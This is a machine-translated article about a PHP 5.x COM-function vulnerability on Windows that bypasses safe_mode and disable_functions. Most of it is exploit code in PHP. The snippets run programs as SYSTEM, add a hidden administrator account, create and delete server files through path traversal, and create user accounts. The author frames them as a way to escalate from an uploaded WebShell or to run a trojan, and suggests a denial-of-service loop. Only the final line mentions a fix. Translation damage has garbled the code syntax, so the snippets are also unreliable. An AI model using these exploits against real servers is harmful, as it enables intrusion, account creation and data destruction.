PHP 5.x COM functions Privilege Escalation Vulnerability and repair

PHP is short for Hypertext Preprocessor. It is an embedded HTML language. It can execute dynamic web pages more quickly than CGI or Perl. PHP has very powerful functions. All CGI or JavaScript functions can be implemented by PHP and support almost all popular databases and operating systems. Recently, a major vulnerability has occurred in PHP that is so powerful and widely used, that is, PHP 5.x COM functions safe_mode and disable_function bypass. It can achieve Elevation of Privilege, which many friends dream. Next, let's take a general look at the vulnerabilities. Due to my limited level, please forgive us for the inaccuracy. The COM function used by the vulnerability only exists in PHP in Windows, and. net support requires PHP5 and. net Runtime. The functions used by the vulnerability do not require special installation and are part of the PHP kernel. By default, PHP in Windows supports these extensions and does not need to load other extensions to call vulnerability functions. Currently, some large and medium-sized websites like to use PHP + Apache + Windows to set up their websites. In this way, PHP vulnerabilities will be exposed, especially in the increasingly difficult situation of privilege escalation, I think many servers will fall due to this vulnerability. According to the content published by the Vulnerability discoverer, the vulnerability exploitation requirements include the following settings in php. ini. My test environment is PHP5.2.3 + Apache2.2.3 + Windows XP SP2. In my test, I found that the configuration does not have to be strictly followed. You can test it by yourself.
Safe_mode = On
Disable_functions = com_load_typelib
Open_basedir = htdocs
Next, let's take a look at the content and utilization of this vulnerability.

RunApplication function in compatUI. dll
The test code for this vulnerability is as follows.
<? Php
$ CompatUI = new COM ({0355854A-7F23-47E2-B7C3-97EE8DD42CD8 });
// Load compatUI. dll $ compatUI-> RunApplication ("something", "notepad.exe", 1 );
// Run notepad
?>

Save it as a PHP file, put it on the server, and then access it with IE. There is no echo for IE after running, as shown in figure 1, but in fact notepad is already running and it is the SYSTEM permission because it is run by the SYSTEM service, therefore, the SYSTEM permission is inherited, as shown in figure 2.

With this vulnerability, we can run a trojan that has been uploaded to escalate the privilege of WebShell. Of course, if you are bored enough, you can also write a loop to let the server run a lot of notebooks to implement D. O.S.

Wscript command

The test code for this vulnerability is as follows.
<? Php
$ Wscript = new COM (wscript. shell); // to use wscript.exe
$ Wscript-> Run ("cmd.exe/c calc.exe"); // Run calc.exe
?>

After the script is deleted, the System-authorized calc.exe process is displayed on the server, as shown in 3. We only need to use our imagination and modify the script to add an administrator account. The specific code is as follows.

<? Php
$ Wscript = new COM (wscript. shell); $ wscript-> Run ("cmd.exe/c net user admin $/add ");
$ Wscript-> Run ("cmd.exe/c net localgroup administrators admin $/add ");
?>

After accessing the script, the administrator can be added successfully. This is a nightmare for SYSTEM permissions, as shown in figure 4.

OpenTextFile in wshom. ocx
OpenTextFile can be used to create a file. The following is the test code for the vulnerability.

<? Php
$ MPath = str_repeat (".. \", 20 );
$ FSO = new COM (Scripting. FileSystemObject); // wshom. ocx is used.
$ FSO-> OpenTextFile ($ mPath. "bat. bat ", 8, true); // create a file on the server. Although this function is used to open a file, it is created if the file does not exist.
?>

The batch processing file bat. bat appears in the root directory of Area C, as shown in Figure 5.

DeleteFile in wshom. ocx
This function can delete files on the server. Be careful when using this function. The test code is as follows.

<? Php
$ MPath = str_repeat (".. \", 20 );
$ FSOdelFile = new COM (Scripting. FileSystemObject );
// Wshom. ocx
$ FSOdelFile-> DeleteFile ($ mPath. ". \ *. dat", True );
// Delete All dat files in the root directory of Area C?>

DeleteFolder in wshom. ocx
This function can be used to delete folders on the server. The test code is as follows:

<? Php
$ MPath = str_repeat (".. \", 20 );
$ FSOdelFolder = new COM (Scripting. FileSystemObject );
// Use wshom. ocx
$ FSOdelFolder-> DeleteFolder ($ mPath. ". \ 11", True );
// Delete a specified folder
?>

After the access, the c: 11 folder is successfully deleted.

Create an account using the Create function in shgina. dll
The test code for this vulnerability is as follows:

<? Php
$ User = new COM ({60664CAF-AF0D-0004-A300-5C7D25FF22A0 });
// Use shgina. dll $ user-> Create ("asd ");
// Create an account asd
?>

However, note that the accounts created using this vulnerability only belong to the users group, as shown in figure 6.

The use of PHP 5.x COM functions vulnerabilities is introduced here. The test code is provided as needed. You can modify it as needed. However, we would like to remind you that the prerequisite for using these vulnerabilities is that we have WebShell before uploading the script for Elevation of Privilege.

Www.2cto.com prompts that the solution has been fixed: the official solution has been fixed. Please arrange the upgrade in time